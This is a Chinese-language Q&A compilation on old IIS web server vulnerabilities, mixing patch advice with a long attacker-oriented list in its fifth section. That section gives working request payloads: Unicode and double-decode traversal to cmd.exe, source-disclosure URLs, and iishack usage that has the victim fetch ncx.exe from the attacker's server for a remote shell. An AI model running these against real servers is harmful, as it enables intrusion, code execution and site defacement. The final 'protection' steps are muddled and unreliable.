㈠ 如何修復IIS短文件名泄露漏洞
打開騰訊電腦管家——工具箱——修復漏洞,進行漏洞掃描和修復。
建議設內置開啟容自動修復漏洞功能,開啟後,電腦管家可以在發現高危漏洞(僅包括高危漏洞,不包括其它漏洞)時,第一時間自動進行修復,無需用戶參與,最大程度保證用戶電腦安全。尤其適合老人、小孩或計算機初級水平用戶使用。開啟方式如下:進入電腦管家「修復漏洞」模塊—「設置」,點擊開啟自動修復漏洞即可。
㈡ 什麼是IIS漏洞
由於寬頻越來越普及,給自己的win2000或是xp裝上簡單易學的iis,搭建一個不定時開放的ftp或是web站點,相信是不少電腦愛好者所嚮往的,而且應該也已經有很多人這樣做了。但是iis層出不窮的漏洞實在令人擔心。遠程攻擊著只要使用webdavx3這個漏洞攻擊程序和telnet命令就可以完成一次對iis的遠程攻擊,
利用iis的webdav漏洞攻擊成功後的界面
這里的systen32就指的是對方機器的系統文件夾了,也就是說黑客此刻執行的任何命令,都是在被入侵的機器上運行的。這個時候如果執行format命令,危害就可想而知了,用net user命令添加帳戶也是輕而易舉的。
應對措施:關注微軟官方站點,及時安裝iis的漏洞補丁。
㈢ 如何修復IIS短文件名泄露漏洞
IIS短文件名泄露漏洞修復解決方案
方案1、修改注冊列表HKLM\SYSTEM\CurrentControlSet\Control\FileSystem \NtfsDisable8dot3NameCreation的值為1,
重啟下機器。(此修改只能禁止 NTFS8.3格式文件名創建,已經存在的文件的短文件名無法移除)。
該修改不能完全修復,只是禁止創建推薦使用後面的修復建議。
方案2、如果你的網站建設部署時,web環境不需要asp.net的支持你可以進入Internet 信息服務(IIS)管理器 ---Web服務擴展-ASP.NET選擇禁止此功能。
方案3、升級net framework 至4.0以上版本.(推薦)
㈣ IIS短文件名泄露漏洞如何解決
我正在嘗試用IIS 7 裡面的請求篩選,過濾~ ,* 字元
㈤ 常見的網路漏洞有哪些
你說的漏洞比較廣,是軟體漏洞還是系統 系統漏洞還有server漏洞還有iis漏洞 我就和你說說iis漏洞吧。1. iis4hack緩沖溢出
主要存在於.htr,.idc和.stm文件中,其對關於這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些後門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一台自己的WEB伺服器。你現在你自己的WEB伺服器上運行WEB服務程序並把ncx.exe放到你自己相應的目錄下,然後使用iishack.exe來檢查目標機器:
c:>iishack.exe <victim> 80 <your web server>/ncx.exe
然後你就使用netcat來連接你要檢測的伺服器:
c:>nc <victim> 80
如果溢出點正確你就可以看到目標機器的命令行提示,並且是管理遠許可權。利用程序見iis4hack.zip
2.msadc
IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在於RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS伺服器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = mp Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h http://www.targe.com/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出現cmd /c後,直接鍵入命令行,就可以以system許可權執行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
察看文件源代碼
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
4.Showcode.asp
察看文件源代碼
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
5.Null.htw
察看文件源代碼
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
6.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變數CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件並返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:
http://www.victim.com/nosuchfile.htw 如果你從伺服器端獲得如下信息:
format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消
這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)
一個攻擊者可以使用如下的方法來訪問系統中文件的內容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼
8.ASP Dot Bug
在請求的URL結尾追加一個或者多個點導致泄露ASP源代碼。
http://www.victim.com/sample.asp.
9.ISM.DLL
這個漏洞是由Cerberus Information Security team.最早發現的,它運行在IIS4.0和5.0上面,允許攻擊者查看任意文件內容和源代碼。通過在文件名後面追加近230個+或者?%20?(這些表示空格)並追加?.htr?的特殊請求給IIS,會使IIS認為客戶端請求的是?.htr?文件,而.htr文件的後綴映射到ISM.DLL ISAPI應用程序,這樣IIS就把這個.htr請求轉交給這個DLL文件,然後ISM.DLL 程序把傳遞過來的文件打開和執行,但在ISM.DLL 截斷信息之前,緩沖區發送 一個截斷開的 .Htr 並會有一些時間去返回一些你要打開的文件內容. 除非 WEB 服務停止並重啟過,否則這攻擊只能有效執行一次。如果已經發送過一個 .htr 請求到機器上,那麼這攻擊會失效.它只能在 ISM.DLL第一次裝入內存時工作.CNNS發現追加+號到沒有一次攻擊這個問題,可以進行多次攻擊。
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
10. .idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪的說有些還在IIS5.0上發現過此類漏洞,通過增加?idc?或者?ida? 後綴到URL會導致IIS嘗試允許通過資料庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.victim.com/anything.idc 或者 anything.idq
11.+.htr Bug
對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的泄露:
http://www.victim.com/global.asa+.htr
12.NT Site Server Adsamples
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者 可能獲得一些如資料庫中的DSN,UID和PASS的一些信息,如:
http://www.victim.com/adsamples/config/site.csc
13./iisadmpwd
IIS4.0中包含一個有趣的特徵就是允許遠程用戶攻擊WEB伺服器上的用戶帳號,就是你的WEB伺服器是通過NAT來轉換地址的,還可以被攻擊。 每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個 .htr文件,匿名用戶允許訪問這些文件,這些文件剛好沒有規定只限制 在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳號和密碼。這個目錄物理映射在下面的目錄下:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
這樣,攻擊者可以通過暴力來猜測你的密碼。
14.Translate:f Bug
泄露asp文件源代碼 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 當有人請求一個ASP/ASA後者其他任意腳本的時候在HTTP GET加上Translate:f 後綴,並在請求文件後面加/就會顯示文件代碼,當然在沒有打WIN2K SP1補丁 為前提。這個是W2K的漏洞,但由於FP2000也安裝在IIS4.0上,所以在IIS4.0上也有這個漏洞。利用程序: trasn1.pl,trans2.pl
15.Unicode
IIS 4.0和IIS 5.0在Unicode字元解碼的實現中存在一個安全漏洞,導致用戶可以遠程通過IIS執行任意命令。當IIS打開文件時,如果該文件名包含unicode字元,它會對其進行解碼,如果用戶提供一些特殊 的編碼,將導致IIS錯誤的打開或者執行某些web根目錄以外的文件。
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
可能需要察看以下幾個目錄
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
eeye開發了工具包iishack1.5針對這一漏洞進行測試
16.iis5.0 緩沖溢出
微軟Win 2K IIS
5的列印ISAPI擴展介面建立了.printer擴展名到msw3prt.dll的映射關系,預設情況下該映射存在。當遠程用戶提交對.printer的URL請求時,IIS
5調用msw3prt.dll解釋該請求。由於msw3prt.dll缺乏足夠的緩沖區邊界檢查,遠程用戶可以提交一個精心構造的針對.printer的URL請求,其"Host:"域包含大約420位元組的數據,此時在msw3prt.dll中發生典型的緩沖區溢出,潛在允許執行任意代碼。溢出發生後,WEB服務停止響應,Win 2K可以檢查到WEB服務停止響應,從而自動重啟它,因此系統管理員很難意識到發生過攻擊。利用程序見iis5hack.zip
17.IIS CGI文件名二次解碼漏洞
IIS在載入可執行CGI程序時,會進行兩次解碼。第一次解碼是對CGI文件名進行http解碼,然後判斷此文件名是否為可執行文件,例如檢查後綴名是否為".exe"或".com"等等。在文件名檢查通過之後,IIS會再進行第二次解碼。正常情況下,應該只對該CGI的參數進行解碼,然而,IIS錯誤地將已經解碼過的CGI文件名和CGI參數一起進行解碼。這樣,CGI文件名就被錯誤地解碼了兩次。
通過精心構造CGI文件名,攻擊者可以繞過IIS對文件名所作的安全檢查,例如對"../"或"./"的檢查,在某些條件下,攻擊者可以執行任意系統命令。
例如,對於』』這個字元,正常編碼後是%5c。這三個字元對應的編碼為:
』%』 = %25
』5』 = %35
』c』 = %63
如果要對這三個字元再做一次編碼,就可以有多種形式,例如:
%255c
%%35c
%%35%63
%25%35%63
...
因此,".."就可以表示成"..%255c"或"..%%35c"等等形式。在經過第一次解碼之後,變成"..%5c"。IIS會認為這是一個正常的字元串,不會違反安全規則檢查。而在第二次被解碼之後,就會變成".."。因此攻擊者就可以使用".."來進行目錄遍歷,執行web目錄之外的任意程序。 好了 先到這里。。。。漏洞太多了不過還是微軟系統排第一的 一個是使用的人群廣 一個是XXX 哈哈哈
㈥ 請教iis目錄漏洞攻擊如何防護
1 找到你的復網站目錄
2 然後右鍵制web 共享,然後選擇共享文件夾
3 訪問許可權,把除了寫入外的其他項勾選,確定
4 至IIS,這時你可以看到剛剛創建的虛似目錄了。
5 右鍵虛似目錄,屬性,目錄安全性,身份驗證和訪問控制,編緝,將啟用匿名訪問和集成windows 身份驗證勾選,確定。
6 回到IIS,然後在右側找到你的文件,右鍵瀏覽就OK了